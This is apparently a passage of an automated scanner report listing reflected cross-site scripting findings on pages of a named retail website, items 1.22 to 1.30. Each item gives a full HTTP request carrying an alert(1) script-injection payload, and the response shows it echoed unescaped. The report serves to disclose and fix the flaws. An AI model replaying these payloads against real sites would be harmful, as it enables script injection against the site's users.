Path:	/shoppingcart/index.cfm

Issue detail

The value of the itemAdded request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab4aa"><script>alert(1)</script>2ba5ea7583c was submitted in the itemAdded parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=12%2f26%2f2010+6%3a55%3a59+AM&requesttimeout=9000&itemAdded=trueab4aa"><script>alert(1)</script>2ba5ea7583c HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:56 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:56 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 64276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=12%2f26%2f2010+6%3a55%3a59+AM&requesttimeout=9000&itemAdded=trueab4aa"><script>alert(1)</script>2ba5ea7583c&quicksignlink=pageend">
...[SNIP]...

1.22. http://www.ebags.com/shoppingcart/index.cfm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/shoppingcart/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bc9a"><script>alert(1)</script>8aebec06550 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shoppingcart/index.cfm?5bc9a"><script>alert(1)</script>8aebec06550=1 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:06:37 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:06:37 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 64074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/shoppingcart/index.cfm?5bc9a"><script>alert(1)</script>8aebec06550=1&quicksignlink=pageend">
...[SNIP]...

1.23. http://www.ebags.com/shoppingcart/index.cfm [requesttimeout parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/shoppingcart/index.cfm

Issue detail

The value of the requesttimeout request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67a7a"><script>alert(1)</script>17ddeba4e9b was submitted in the requesttimeout parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=%7Bts%20%272010%2D12%2D26%2006%3A55%3A59%27%7D&requesttimeout=200067a7a"><script>alert(1)</script>17ddeba4e9b HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:15 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:15 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 64284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=%7Bts%20%272010%2D12%2D26%2006%3A55%3A59%27%7D&requesttimeout=200067a7a"><script>alert(1)</script>17ddeba4e9b&quicksignlink=pageend">
...[SNIP]...

1.24. http://www.ebags.com/ [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 837d1'%3balert(1)//1c7ecab77cc was submitted in the SPLITSESSION cookie. This input was echoed as 837d1';alert(1)//1c7ecab77cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C837d1'%3balert(1)//1c7ecab77cc; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:03:57 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:03:57 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 74992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|837d1';alert(1)//1c7ecab77cc');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.25. http://www.ebags.com/blocks/dsp_non_discountable_brands.cfm [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/blocks/dsp_non_discountable_brands.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload feaa6'%3balert(1)//78f8edd5719 was submitted in the SPLITSESSION cookie. This input was echoed as feaa6';alert(1)//78f8edd5719 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /blocks/dsp_non_discountable_brands.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cfeaa6'%3balert(1)//78f8edd5719; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:03:13 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 14:03:13 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 36866

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<script language="javascript">
function redir(site)
{
window.opener.location.href = site;
window.close()
}
function
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','BECOME01$COUPONID=40959822');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|feaa6';alert(1)//78f8edd5719');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.26. http://www.ebags.com/blocks/dsp_prop65.cfm [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/blocks/dsp_prop65.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f39a'%3balert(1)//5bb97bc106 was submitted in the SPLITSESSION cookie. This input was echoed as 5f39a';alert(1)//5bb97bc106 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /blocks/dsp_prop65.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C5f39a'%3balert(1)//5bb97bc106; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:02:53 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 14:02:53 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 5476

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<script language="javascript">
function redir(site)
{
window.opener.location.href = site;
window.close()
}
function
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','BECOME01$COUPONID=40959822PRODUCTID=');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|5f39a';alert(1)//5bb97bc106');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.27. http://www.ebags.com/brand/athalon [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/athalon

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2404'%3balert(1)//cf7d16e2d7 was submitted in the SPLITSESSION cookie. This input was echoed as c2404';alert(1)//cf7d16e2d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /brand/athalon HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cc2404'%3balert(1)//cf7d16e2d7; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:15:17 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:15:17 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 75088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|c2404';alert(1)//cf7d16e2d7');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.28. http://www.ebags.com/brand/bosca [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/bosca

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71225'%3balert(1)//a44107e12fc was submitted in the SPLITSESSION cookie. This input was echoed as 71225';alert(1)//a44107e12fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /brand/bosca HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C71225'%3balert(1)//a44107e12fc; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:14:39 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:14:39 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 116689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|71225';alert(1)//a44107e12fc');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.29. http://www.ebags.com/brand/burton [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/burton

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97424'%3balert(1)//258024c82f9 was submitted in the SPLITSESSION cookie. This input was echoed as 97424';alert(1)//258024c82f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /brand/burton HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C97424'%3balert(1)//258024c82f9; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:15:29 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:15:29 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 106114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|97424';alert(1)//258024c82f9');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.30. http://www.ebags.com/brand/eagle-creek [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/eagle-creek

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecec4'%3balert(1)//f2ada83a4d7 was submitted in the SPLITSESSION cookie. This input was echoed as ecec4';alert(1)//f2ada83a4d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /brand/eagle-creek HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cecec4'%3balert(1)//f2ada83a4d7; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:14:23 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:14:23 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 123022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|ecec4';alert(1)//f2ada83a4d7');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

